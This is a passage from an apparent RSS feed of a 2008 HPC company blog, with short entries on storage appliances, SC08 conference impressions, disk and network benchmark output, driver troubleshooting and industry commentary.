      <description>Working on a proposal document for a (prospective) customer. In some things Word is a little smarter than OO3. I did most of the spreadsheet work on OO3 and saved the Excel document. Started the proposal in OO3 as well. Thought to myself &amp;hellip; &amp;ldquo;ok, why not boot the laptop into Windows and use Word&amp;rdquo;. After all, it won&amp;rsquo;t bite me in the rear &amp;hellip; hah hah &amp;hellip; it would never do that &amp;hellip; and like &amp;hellip; I dunno &amp;hellip; FAIL TO SAVE &amp;hellip; and then CRASH after it FAILS TO SAVE &amp;hellip; thus taking hours of work down with it.</description>
    </item>
    
    <item>
      <title>I loved the headline ...</title>
      <link>https://blog.scalability.org/2008/12/i-loved-the-headline/</link>
      <pubDate>Thu, 04 Dec 2008 23:43:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/i-loved-the-headline/</guid>
      <description>The day job showed up on the local news, the Great Lakes IT Report. I loved the title &amp;hellip; Huge New Storage Machines From Canton Firm. FWIW: WWJ is the local AM radio station (950AM) that my car radio is tuned to about 1/2 the time. :)</description>
    </item>
    
    <item>
      <title>Mmmmm .... coffee .... mmmmm</title>
      <link>https://blog.scalability.org/2008/12/mmmmm-coffee-mmmmm/</link>
      <pubDate>Wed, 03 Dec 2008 01:49:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/mmmmm-coffee-mmmmm/</guid>
      <description>well &amp;hellip; er &amp;hellip; ah &amp;hellip; ok.
mmmmmm &amp;hellip;. coffee &amp;hellip;. mmmmmm &amp;hellip; well &amp;hellip; it&amp;rsquo;s Nescafe &amp;hellip; not Kona. So maybe not really coffee &amp;hellip; Being a former computational physics type, I had to warm my coffee on the processors &amp;hellip;</description>
    </item>
    
    <item>
      <title>Announcing ΔV</title>
      <link>https://blog.scalability.org/2008/12/announcing-v/</link>
      <pubDate>Wed, 03 Dec 2008 00:30:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/announcing-v/</guid>
      <description>Have a look here for the PDF version, or below for the text version. **Scalable Informatics Enables Companies To Do More While Spending Less With Low-Cost High Performance Storage Appliances** Canton, MI - December 2, 2008 - Scalable Informatics (www.scalableinformatics.com), provider of high performance computing and storage solutions, announced the introduction of Delta-V, their latest storage appliance providing outstanding performance and reliability at an exceptional price.
A Delta-V 3 unit was demonstrated at SC08, the international conference for high performance computing, networking, storage and analysis, in downtown Austin in mid-November, 2008 in support of Pervasive Software.</description>
    </item>
    
    <item>
      <title>New day job web site ... check it out!</title>
      <link>https://blog.scalability.org/2008/12/new-day-job-web-site-check-it-out/</link>
      <pubDate>Wed, 03 Dec 2008 00:21:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/new-day-job-web-site-check-it-out/</guid>
      <description>Doug has been trying to convince me that he could do a better job with the CMS tools, cranking out a basic design (I like simple &amp;hellip;), than I could at hacking code. Have a look here. The JackRabbit site was also folded in. The (now former) website we had up was an MVC-based application using Catalyst. I used jQuery for the effects &amp;hellip; yadda yadda yadda.
This meant I coded it.</description>
    </item>
    
    <item>
      <title>The Register on Sun: what&#39;s a company to do?</title>
      <link>https://blog.scalability.org/2008/12/the-register-on-sun-whats-a-company-to-do/</link>
      <pubDate>Tue, 02 Dec 2008 14:46:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/the-register-on-sun-whats-a-company-to-do/</guid>
      <description>A good read over at the Register on the trials and tribulations at Sun. Yeah, I know, shortly after I post this, our sites are gonna get DDoSed. Seems to happen all the time (any post that doesn&amp;rsquo;t paint Sun as a glowing ball of hot plasma &amp;hellip; seems to disagree with some groups out there). The basic premise is that Sun is in the not so enviable position of its valuation being approximately equal to its pile of cash.</description>
    </item>
    
    <item>
      <title>Competitive benchmarks</title>
      <link>https://blog.scalability.org/2008/12/competitive-benchmarks/</link>
      <pubDate>Tue, 02 Dec 2008 14:07:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/competitive-benchmarks/</guid>
      <description>Ok, we wouldn&amp;rsquo;t benchmark these machines in quite the way these folks did, but there are some useful nuggets within. Also, these folks appear to be skirting the &amp;ldquo;do not talk about Nehalem performance&amp;rdquo; requirement of getting early access to Nehalem. See this link. The interesting benchmarks show up around page 9. Interesting though, regardless. Java people ought to love Shanghai. Not too many others, though. And the Nehalem performance &amp;ldquo;hints&amp;rdquo; left one&amp;rsquo;s jaw on the floor.</description>
    </item>
    
    <item>
      <title>Another Paul Graham piece worth a read</title>
      <link>https://blog.scalability.org/2008/12/another-paul-graham-piece-worth-a-read/</link>
      <pubDate>Tue, 02 Dec 2008 01:31:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/another-paul-graham-piece-worth-a-read/</guid>
      <description>Paul Graham writes quite a few essays. Some are ok, some are really good. This is one of the latter. With a slight rewording, I can replace placing &amp;ldquo;checks&amp;rdquo; on &amp;ldquo;programmers&amp;rdquo; with introducing &amp;ldquo;barriers&amp;rdquo; to &amp;ldquo;HPC consumers&amp;rdquo;. Seriously, his statement on costs is quite consistent with a dictum I often mutter &amp;hellip; er &amp;hellip; say: Every decision has a cost.
A decision to use a certain prescribed subset of vendors guarantees you will not get the benefits of an open set of vendors.</description>
    </item>
    
    <item>
      <title>MSFT Vista</title>
      <link>https://blog.scalability.org/2008/12/msft-vista/</link>
      <pubDate>Mon, 01 Dec 2008 13:28:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/12/msft-vista/</guid>
      <description>I read a /.-linked blog on ComputerWorld.UK this morning. In it was a most amusing characterization of Vista:
The post goes on to suggest that upgrades are over as a business. I am not convinced this is true, but their point is that things like OpenOffice are pretty good. Well, yes. OO3 is actually quite good. I use it on Linux, on Windows. Even on Vista (long story, daughter&amp;rsquo;s future laptop &amp;hellip; shhh &amp;hellip; don&amp;rsquo;t tell her &amp;hellip; would like to get her using Linux, maybe we will &amp;hellip; let&amp;rsquo;s see).</description>
    </item>
    
    <item>
      <title>An interesting yet fictional cautionary tale</title>
      <link>https://blog.scalability.org/2008/11/an-interesting-yet-fictional-cautionary-tale/</link>
      <pubDate>Sat, 29 Nov 2008 15:34:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/an-interesting-yet-fictional-cautionary-tale/</guid>
      <description>From TheFunded.com: Link to original is here. It starts out like this &amp;hellip;
I recommend reading it all. It strikes me as similar to Arthur C. Clarke&amp;rsquo;s short story &amp;ldquo;Superiority&amp;rdquo; &amp;hellip; a different side of it. [Update] I just noticed that the link doesn&amp;rsquo;t show all the text. It is supposed to be public. So I will reproduce it here.</description>
    </item>
    
    <item>
      <title>Motherboards</title>
      <link>https://blog.scalability.org/2008/11/motherboards/</link>
      <pubDate>Thu, 27 Nov 2008 16:18:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/motherboards/</guid>
      <description>One thing we continuously struggle with is users who decide to get the lowest cost (and often lowest quality) motherboards. You wind up spending so much extra time/effort to get these things to work correctly that it completely overwhelms any cost savings you may have thought to realize by buying them. Have one of these now. System refuses to boot a more modern kernel &amp;hellip; some driver somewhere hangs. This isn&amp;rsquo;t our system; we wouldn&amp;rsquo;t sell MBs like this.</description>
    </item>
    
    <item>
      <title>Roundup of OSS cluster stacks:  please let me know what you use</title>
      <link>https://blog.scalability.org/2008/11/roundup-of-oss-cluster-stacks-please-let-me-know-what-you-use/</link>
      <pubDate>Wed, 26 Nov 2008 18:04:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/roundup-of-oss-cluster-stacks-please-let-me-know-what-you-use/</guid>
      <description>I am looking at new cluster stacks for a number of reasons. We have one internally (Tiburon) which is quite flexible and powerful, but I don&amp;rsquo;t want to push it out just yet (have some additional bits to deal with). I&amp;rsquo;d like to hear what people are using out there. Ones I am not interested in are Rocks and its derivatives, and OSCAR. I am interested in xCAT2, and any others out there as stacks.</description>
    </item>
    
    <item>
      <title>When &#34;communities&#34; pick their friends and enemies</title>
      <link>https://blog.scalability.org/2008/11/when-communities-pick-their-friends-and-enemies/</link>
      <pubDate>Wed, 26 Nov 2008 17:59:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/when-communities-pick-their-friends-and-enemies/</guid>
      <description>I recently had a run-in with one of the &amp;ldquo;leaders&amp;rdquo; of a cluster management system. This person decided I went over the line in reporting on a security issue, our forensics, and how to go about helping prevent it in the future. Previously, I had been warned for daring to point to a benchmark document. Despite being a contributor to and a supporter of this technology, this offering, having written articles on it for magazine publication, having helped many customers use it &amp;hellip; this &amp;ldquo;leader&amp;rdquo; decided that I had crossed a line.</description>
    </item>
    
    <item>
      <title>The elements of success in accelerator technology</title>
      <link>https://blog.scalability.org/2008/11/the-elements-of-success-in-accelerator-technology/</link>
      <pubDate>Mon, 24 Nov 2008 21:03:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/the-elements-of-success-in-accelerator-technology/</guid>
      <description>Some time ago, I had posited that the right approach to building a viable business in accelerators was to target ubiquity. It is worth revisiting some of this and delving into how to make accelerator use painless.
Basically, for people to get real value out of accelerators, they have to provide enough benefit over the life of the host platform such that the investment can be recouped. This is the fundamental raison d&amp;rsquo;etre for accelerators.</description>
    </item>
    
    <item>
      <title>SC08: the wrap up (probably part 1)</title>
      <link>https://blog.scalability.org/2008/11/sc08-the-wrap-up-probably-part-1/</link>
      <pubDate>Sun, 23 Nov 2008 13:56:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-the-wrap-up-probably-part-1/</guid>
      <description>SC08 has been over for a few days. I have multiple impressions, and will try to outline them here. Please post your impressions as well. First: Being in Pervasive Software&amp;rsquo;s booth was great. They are a great group, with an interesting product. As they noted, most HPC is not Java, and they get that it won&amp;rsquo;t be for the foreseeable future. That said, I think they got lots of good feedback from potential consumers of their product.</description>
    </item>
    
    <item>
      <title>SC08: Day 2, as the market tumbles ...</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-2-as-the-market-tumbles/</link>
      <pubDate>Thu, 20 Nov 2008 05:10:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-2-as-the-market-tumbles/</guid>
      <description>One of the aspects about being on a show floor all day, talking to partners and prospective customers, is that you sort of have to ignore what&amp;rsquo;s going on around you in the market outside of the walls of the center. The stock market closed below 8000 today. Some of the more traditional HPC stocks have been walloped. Like SGI. On a day when the market dropped 5%, they dropped 16.</description>
    </item>
    
    <item>
      <title>SC08:  Day 1 ... more detailed video for DataRush</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-1-more-detailed-video-for-datarush/</link>
      <pubDate>Wed, 19 Nov 2008 05:55:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-1-more-detailed-video-for-datarush/</guid>
      <description></description>
    </item>
    
    <item>
      <title>SC08:  Day wrap-up</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-wrap-up/</link>
      <pubDate>Wed, 19 Nov 2008 05:17:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-wrap-up/</guid>
      <description>I saw many things at SC08 &amp;hellip; first off, most of the people we saw running disks were running some sort of multi-pipe direct attached storage with RAID0&amp;rsquo;s. Yeah, this shows bandwidth real well. Not how users really run them, but it shows some nice inflated numbers. Compare this with a RAID10 running over a single iSCSI 10 GbE connection. Most folks are used to slow iSCSI, and can&amp;rsquo;t believe our numbers, until they see them.</description>
    </item>
    
    <item>
      <title>SC08: Day 1, Fixstars and Terrasoft</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-1-fixstars-and-terrasoft/</link>
      <pubDate>Wed, 19 Nov 2008 04:56:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-1-fixstars-and-terrasoft/</guid>
      <description>Fixstars is there with its recent acquisition of Terrasoft. Fixstars makes very interesting Cell accelerator cards, and we can place them into units like Pegasus for deskside, and JackRabbit and ΔV for server applications. This looks to be the first viable Cell accelerator card. Terrasoft was pretty good with the OS/tools side of things, so hopefully the combination of these two will result in good challenger to GPUs. Pricing is close to where it needs to be.</description>
    </item>
    
    <item>
      <title>SC08:  Day 1, mpi-HMMer and its GPU port are generating excitement</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-1-mpi-hmmer-and-its-gpu-port-are-generating-excitement/</link>
      <pubDate>Wed, 19 Nov 2008 04:52:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-1-mpi-hmmer-and-its-gpu-port-are-generating-excitement/</guid>
      <description>We have spoken to a whole bunch of people about mpiHMMer and the incredible work JP has done on it. For those who don&amp;rsquo;t know, mpiHMMer is an MPI implementation of the HMMer code base. JP is working on getting it into the nVidia booth/machines, and will run a few demos tomorrow for people. [Let me know if you would like to see it](mailto:joe@scalability.org?subject=mpiHMMer demo). If you are not sure why it is interesting, consider that it has a multiple GPU version that JP benchmarked at more than 100x performance gain.</description>
    </item>
    
    <item>
      <title>SC08:  Day 1, Pervasive Software&#39;s Mike Hoskins talks about DataRush</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-1-pervasive-softwares-mike-hoskins-talks-about-datarush/</link>
      <pubDate>Wed, 19 Nov 2008 04:47:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-1-pervasive-softwares-mike-hoskins-talks-about-datarush/</guid>
      <description></description>
    </item>
    
    <item>
      <title>SC08: Day 0 - Missed the Beowulf Bash</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-0-missed-the-beowulf-bash/</link>
      <pubDate>Tue, 18 Nov 2008 03:59:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-0-missed-the-beowulf-bash/</guid>
      <description>This wasn&amp;rsquo;t on purpose. We got there a little late, saw a line outside the door &amp;hellip; which didn&amp;rsquo;t move &amp;hellip; :(</description>
    </item>
    
    <item>
      <title>SC08: Day 0 part 3</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-0-part-3/</link>
      <pubDate>Mon, 17 Nov 2008 22:27:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-0-part-3/</guid>
      <description>This show is for the birds &amp;hellip;. the pigeons, that is &amp;hellip; the ones wandering near the booth. I hope that &amp;hellip; er &amp;hellip; ah &amp;hellip; nothing gets into the machines &amp;hellip; Not exactly bugs, but it is possible that someone could tell you that your machine is full of pigeon droppings &amp;hellip; and mean it in a literal sense.</description>
    </item>
    
    <item>
      <title>SC08: Day 0 part 2</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-0-part-2/</link>
      <pubDate>Mon, 17 Nov 2008 21:38:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-0-part-2/</guid>
      <description>Ok, we have the machines set up in the Pervasive Software booth, #203. Had a power hiccup (e.g. Joe knocked the power out while moving the rack) so we used this as an excuse to reconfigure the RAID to its RAID10 state. There really was no advantage to the RAID0 version, and the risk of problems was higher. RAID should be resynched in another 53 minutes. We have a single 10 GbE handling all the traffic &amp;hellip; looks like Windows didn&amp;rsquo;t like sending traffic simultaneously on both links.</description>
    </item>
    
    <item>
      <title>SC08: Day 0 ... monday morning ...</title>
      <link>https://blog.scalability.org/2008/11/sc08-day-0-monday-morning/</link>
      <pubDate>Mon, 17 Nov 2008 16:52:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-day-0-monday-morning/</guid>
      <description>Here we are, sitting in that most important spot, by the coffee, waiting for our cohorts and colleagues &amp;hellip; Austin is a nice place&amp;hellip; the SC08 map is kinda &amp;hellip; I dunno &amp;hellip; a little small-ish? Some of us [old: Doug&amp;rsquo;s suggestion, talking about me] folks can&amp;rsquo;t quite read it &amp;hellip;</description>
    </item>
    
    <item>
      <title>SC08: Come see ΔV3 in Pervasive Software&#39;s booth</title>
      <link>https://blog.scalability.org/2008/11/sc08-come-see-v3-in-pervasive-softwares-booth/</link>
      <pubDate>Sun, 16 Nov 2008 05:08:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/sc08-come-see-v3-in-pervasive-softwares-booth/</guid>
      <description>Make sure you look at their data mining demo. DataRush (as indicated in the previous post) is a cool technology, and we are happy to be helping out. Pervasive Software has a vision for data intensive HPC that aligns well with what we have been saying. Personal supercomputing has been something we have been talking about for about 8 years, since I developed CT-BLAST. That was a tool to completely hide the pain of dealing with clusters for running one application, NCBI BLAST.</description>
    </item>
    
    <item>
      <title>Another side of HPC: data intensive HPC</title>
      <link>https://blog.scalability.org/2008/11/another-side-of-hpc-data-intensive-hpc/</link>
      <pubDate>Sun, 16 Nov 2008 04:46:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/another-side-of-hpc-data-intensive-hpc/</guid>
      <description>We have called this other names in the past, but basically data intensive HPC is pretty much anything that involves streaming huge amounts of data past processing elements to effect the calculation or analysis at hand. This type of HPC is not usually typified by large linear algebra solvers, so things like HPCC and LINPACK are less meaningful characterizations for data intensive performance, as this often relies upon significant IO firepower, as well as many cores.</description>
    </item>
    
    <item>
      <title>The business side of HPC ...</title>
      <link>https://blog.scalability.org/2008/11/the-business-side-of-hpc/</link>
      <pubDate>Sat, 15 Nov 2008 18:10:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/the-business-side-of-hpc/</guid>
      <description>&amp;hellip; is like any other business: there are ups and downs. Companies in HPC, both core HPC companies and those with HPC practices, are not immune to the state of the economy as a whole. If spending drops precipitously, businesses need to re-adjust and re-align. It definitely hurts if you are one of those &amp;hellip; re-aligned.
I have been there, and done that. I have been &amp;ldquo;re-aligned&amp;rdquo; twice, during downturns. The most recent time was during the last bubble, in 2002.</description>
    </item>
    
    <item>
      <title>Looks like the updated security measures are holding ...</title>
      <link>https://blog.scalability.org/2008/11/looks-like-the-updated-security-measures-are-holding/</link>
      <pubDate>Thu, 13 Nov 2008 06:04:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/looks-like-the-updated-security-measures-are-holding/</guid>
      <description>Quite early in the process, but we see probes have dropped off. Some of this may be due to the IP level (draconian) restrictions. The outline of the new security measures is as follows:
 The user has to have a valid VPN certificate to ssh to the system. Users cannot share a certificate. This isn&amp;rsquo;t simply policy; it is enforced at a technological level. Outgoing traffic is pretty much restricted to the VPN and a specific set of ports.</description>
    </item>
    
    <item>
      <title>More ΔV numbers: as a direct attached storage to a Windows 2008 x64 server</title>
      <link>https://blog.scalability.org/2008/11/more-v-numbers-as-a-direct-attached-storage-to-a-windows-2008-x64-server/</link>
      <pubDate>Wed, 12 Nov 2008 02:30:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/more-v-numbers-as-a-direct-attached-storage-to-a-windows-2008-x64-server/</guid>
      <description>This is over a single 10 GbE link, using a pair of Intel cards with the ixgbe driver, and a CX-4 cable. The ΔV is configured in one of our two basic modes, in this case, a RAID10 unit. It is exporting a roughly 3.5TB partition over iSCSI to the Windows 2008 x64 Server box. This is an Intel dual Woodcrest 2.66 GHz box with 4 GB RAM.
I wanted to see what the bandwidth limits are.</description>
    </item>
    
    <item>
      <title>Quick ΔV performance numbers for the box going to SC08</title>
      <link>https://blog.scalability.org/2008/11/quick-v-performance-numbers-for-the-box-going-to-sc08/</link>
      <pubDate>Tue, 11 Nov 2008 03:38:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/quick-v-performance-numbers-for-the-box-going-to-sc08/</guid>
      <description>I thought people might like to see this:
root@dV3:~# dd if=/dev/zero of=/big/big.file ...
2048+0 records in
2048+0 records out
34359738368 bytes (34 GB) copied, 97.0368 s, 354 MB/s
root@dV3:~# dd if=/big/big.file of=/dev/null ...
2048+0 records in
2048+0 records out
34359738368 bytes (34 GB) copied, 57.4585 s, 598 MB/s
and some bonnie++
Version 1.03b ------Sequential Output------ --Sequential Input- --Random-
              -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks--
Machine  Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP
dV3 16G 360487 53 162147 32 542351 45 610.</description>
    </item>
    
    <item>
      <title>Now we are talking peta-flops ... baby!</title>
      <link>https://blog.scalability.org/2008/11/now-we-are-talking-peta-flops-baby/</link>
      <pubDate>Mon, 10 Nov 2008 21:24:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/now-we-are-talking-peta-flops-baby/</guid>
      <description>A petaflop here, a petaflop there, and soon we are talking about real performance</description>
    </item>
    
    <item>
      <title>Partner updates coming soon ... and a product announcement as well ...</title>
      <link>https://blog.scalability.org/2008/11/partner-updates-coming-soon-and-a-product-announcement-as-well/</link>
      <pubDate>Sat, 08 Nov 2008 17:21:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/partner-updates-coming-soon-and-a-product-announcement-as-well/</guid>
      <description>Should have some exciting news around the day job and a partnership we are working on. Will be in time for the SC08 show. Also, we should have some product announced soon. Real soon. Very exciting stuff for us &amp;hellip; We have already sold one (as of yesterday, we have the PO), and I am hoping to have one or more sold by early next week.
Not &amp;ldquo;game changing&amp;rdquo; from a technological perspective as Henry Newman posited on a blog post recently, but from other perspectives, it very well could be.</description>
    </item>
    
    <item>
      <title>Looks like there are problems with Seagate&#39;s 1.5TB drive firmware</title>
      <link>https://blog.scalability.org/2008/11/looks-like-there-are-problems-with-seagates-15tb-drive-firmware/</link>
      <pubDate>Sat, 08 Nov 2008 16:24:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/looks-like-there-are-problems-with-seagates-15tb-drive-firmware/</guid>
      <description>We have customers interested in using these drives. So we are looking into getting some. I am seeing some awful reports on the fora about buggy firmware. The response from Seagate doesn&amp;rsquo;t appear to be good. First they say they don&amp;rsquo;t support Linux, then they say they don&amp;rsquo;t support RAID with these (despite small local RAIDs being on their list of best fit applications). Now they claim it is a Linux problem, and the folks on the kernel list &amp;hellip; um &amp;hellip; disagree.</description>
    </item>
    
    <item>
      <title>Ok, this isn&#39;t terrible ...</title>
      <link>https://blog.scalability.org/2008/11/ok-this-isnt-terrible/</link>
      <pubDate>Fri, 07 Nov 2008 14:23:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/ok-this-isnt-terrible/</guid>
      <description>NFS over RDMA between a pair of JackRabbit systems with a Mellanox Connect-X card and a direct cable. We are getting about 500 MB/s +/- some on reads, and about 300 MB/s +/- a bit on writes. Not great, but actually in line with what is observed here. See the NFS over RDMA plots near the middle. This is about 1/3 of the available disk bandwidth on reads, and a little less than a 1/3 on writes.</description>
    </item>
    
    <item>
      <title>some quick iperf numbers for Connect-X</title>
      <link>https://blog.scalability.org/2008/11/some-quick-iperf-numbers-for-connect-x/</link>
      <pubDate>Fri, 07 Nov 2008 05:03:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/some-quick-iperf-numbers-for-connect-x/</guid>
      <description>On this blog, we have done some testing of Connect-X using OFED 1.3.1. This is on Ubuntu 8.04, and not on RedHat. Yes, we have a mostly functional OFED 1.3.1 we distribute on JackRabbit (and soon ΔV). I wanted to see what sort of performance we could get out of a single-port DDR connection between two units.
On the server, I ran iperf -s and on the client I ran iperf -c 10.</description>
    </item>
    
    <item>
      <title>Doing some testing on a pair of JackRabbits</title>
      <link>https://blog.scalability.org/2008/11/doing-some-testing-on-a-pair-of-jackrabbits/</link>
      <pubDate>Thu, 06 Nov 2008 03:35:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/doing-some-testing-on-a-pair-of-jackrabbits/</guid>
      <description>The Connect-X cards arrived this morning, so we are late in shipping the units to the customer. Ugh, but manageable. Most everything is ready, about to launch octobonnie on it for the burn. Octobonnie is an example of an extreme stress test. We stress [JackRabbit](http://jackrabbit.scalableinformatics.com) hard during basic testing. As a result, we learned quite a bit about how this system comes up and performs. Startup is fine, though PCI-e buses and BIOSes being what they are, every now and then PCI-e x8 cards negotiate at x1.</description>
    </item>
    
    <item>
      <title>Parse this! /dev/sda2  ... no really, I want you to parse this ... not interpolate it ...</title>
      <link>https://blog.scalability.org/2008/11/parse-this-devsda2-no-really-i-want-you-to-parse-this-not-interpolate-it/</link>
      <pubDate>Sat, 01 Nov 2008 05:03:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/11/parse-this-devsda2-no-really-i-want-you-to-parse-this-not-interpolate-it/</guid>
      <description>For some of the lower level tools we are developing for ΔV (and for JackRabbit), we need to parse device strings that look like this: &amp;ldquo;/dev/sda1&amp;rdquo;. We have been doing this for years with the Perl Getopt::Long module. Well, something interesting happened today. I need to dig into it, but it looks like a (bad) change to some of the standard Perl libraries installed on this machine (Ubuntu based with our kernel).</description>
    </item>
    
    <item>
      <title>Ever have something ...</title>
      <link>https://blog.scalability.org/2008/10/ever-have-something/</link>
      <pubDate>Fri, 31 Oct 2008 22:23:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/ever-have-something/</guid>
      <description>&amp;hellip; that you really really want to talk about &amp;hellip; but you can&amp;rsquo;t in any depth? &amp;hellip; but it would be an awesome story if you did &amp;hellip; &amp;hellip; but you can&amp;rsquo;t &amp;hellip;
Yeah, we have one of those now. And it is about JackRabbit. All I think I can say (and I am still picking my jaw up off the floor), is 50x.</description>
    </item>
    
    <item>
      <title>Agami has left the building</title>
      <link>https://blog.scalability.org/2008/10/agami-has-left-the-building/</link>
      <pubDate>Fri, 31 Oct 2008 11:48:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/agami-has-left-the-building/</guid>
      <description>I should have posted this back when it happened, but I seem to have let it slip. An article in the Merc has some information on Agami going bust. I had seen &amp;ldquo;Scalable Storage Systems&amp;rdquo; announce its existence, but hadn&amp;rsquo;t heard details. And for some strange reason, I never looked into why Agami wasn&amp;rsquo;t there anymore. In this economy, companies imploding is nothing unexpected. If anything, this economy has largely demolished the myth that small companies are more likely to go under than large companies.</description>
    </item>
    
    <item>
      <title>quotes</title>
      <link>https://blog.scalability.org/2008/10/quotes/</link>
      <pubDate>Fri, 31 Oct 2008 05:05:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/quotes/</guid>
      <description>A bit OT, but I thought it would be fun to share.
Someone on linkedin asked this question in an entrepreneur list. What quotes inspire you the most? The first is a George Bernard Shaw quote:
This makes me think of entrepreneurs as &amp;ldquo;unreasonable men&amp;rdquo;. We try to get the world, or at least our chunk of it, to see the value in what we do. The second is a Robert Heinlein quote, from one of my favorite books:</description>
    </item>
    
    <item>
      <title>Financial updates in a dangerous economy</title>
      <link>https://blog.scalability.org/2008/10/financial-updates-in-a-dangerous-economy/</link>
      <pubDate>Tue, 28 Oct 2008 23:11:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/financial-updates-in-a-dangerous-economy/</guid>
      <description>John West at InsideHPC.com pointed to an article at Barron&amp;rsquo;s about SGI. Before I get into this, I want to note that I had wondered whether or not we would continue to see (massive) oscillations in the market, as it effectively dissipated valuation, or if it would start tending towards an asymptotic lower limit &amp;hellip; testing the bottom as it were. It seems that the forces that are driving the economy are continuing to drive valuation out of the market.</description>
    </item>
    
    <item>
      <title>2.6.27.4 &#43; nVidia .... I think it is working ...</title>
      <link>https://blog.scalability.org/2008/10/26274-nvidia-i-think-it-is-working/</link>
      <pubDate>Tue, 28 Oct 2008 04:56:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/26274-nvidia-i-think-it-is-working/</guid>
      <description>Only took this &amp;hellip;
sh ~root/NVIDIA-Linux-x86_64-177.80-pkg2.run --kernel-output-path=/lib/modules/2.6.27.4/build/ -k 2.6.27.4 --no-runlevel-check --kernel-module-only --no-x-check
and some tweaking of the installed kernel source (strange, it wasn&amp;rsquo;t &amp;lsquo;make prepare&amp;rsquo; ed already) [update] nope &amp;hellip; but I understand the cause. The build machine has a different compiler than the target machine. As a result, the compiler on the target machine generates subtly different kernel modules than that of the build machine. And they disagree on the version of struct_module.</description>
    </item>
    
    <item>
      <title>QDR switches are here, QDR switches are here!</title>
      <link>https://blog.scalability.org/2008/10/qdr-switches-are-here-qdr-switches-are-here/</link>
      <pubDate>Mon, 27 Oct 2008 13:16:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/qdr-switches-are-here-qdr-switches-are-here/</guid>
      <description>(channeling Steve Martin in &amp;ldquo;The Jerk&amp;rdquo; when talking about the new phonebooks &amp;hellip;) 40 Gb ports. $400/port or so. See InsideHPC.com for more. For any Voltaire folks reading this, feel free to fire over a loaner QDR switch and pair of cards. We would love to see if the pair of JackRabbits we are finishing up for a customer will in fact be able to saturate these links. The issue is usually that the buffer copies between the disk and network drivers are slow, so we see significant performance loss with SDR.</description>
    </item>
    
    <item>
      <title>The impact of the financial state upon HPC</title>
      <link>https://blog.scalability.org/2008/10/the-impact-of-the-financial-state-upon-hpc/</link>
      <pubDate>Sun, 26 Oct 2008 16:28:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/the-impact-of-the-financial-state-upon-hpc/</guid>
      <description>HPC in general has demonstrated time and again that it provides value in up and down markets. The real value of being able to get (even approximate) answers to &amp;ldquo;what-if&amp;rdquo; questions has not been accurately measured or accounted for. Moreover, much engineering and R&amp;amp;D work depends critically upon simulation. I expect companies to be far more frugal with new acquisitions, and want to focus upon getting more value and work out of their existing systems.</description>
    </item>
    
    <item>
      <title>Because ... you know ... its like so totally a good idea ...</title>
      <link>https://blog.scalability.org/2008/10/because-you-know-its-like-so-totally-a-good-idea/</link>
      <pubDate>Sat, 25 Oct 2008 18:57:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/10/because-you-know-its-like-so-totally-a-good-idea/</guid>
      <description>not.
Posted this to the Rocks list as a result of the question asked:
and this is what I got back
Yeah. Good move folks. Real good. Noticed that it had been on for a few more posts as well. Ok. What I take home from this is that the administrators in that community want
